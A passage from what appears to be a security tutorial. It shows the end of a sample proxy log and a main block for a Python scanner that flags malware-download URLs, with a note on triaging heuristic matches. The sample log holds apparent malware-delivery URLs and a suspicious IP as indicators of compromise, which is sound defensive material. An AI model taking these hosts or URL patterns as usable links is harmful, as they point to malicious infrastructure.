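    "2019-02-12T09:02:05Z 10.0.0.33 GET http://zgnoeliakatelynn.com/favicon.ico 404",
    "2019-02-12T09:02:30Z 10.0.0.33 GET http://new-host.invalid/xap_102b-AZ1/704e.php?l=qwer3.gas 200",
    "2019-02-12T09:02:50Z 10.0.0.40 GET http://209.141.58.88/ 200",
    "2019-02-12T09:03:00Z 10.0.0.40 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(h["verdict"], h["client"], h["url"], "-", h["reason"])
```

The "pattern" verdict is deliberately kept apart from "ioc": it catches a download server that was not in the list at the time of the report, but it is a heuristic derived from the listed URLs and should be triaged, not blocked outright.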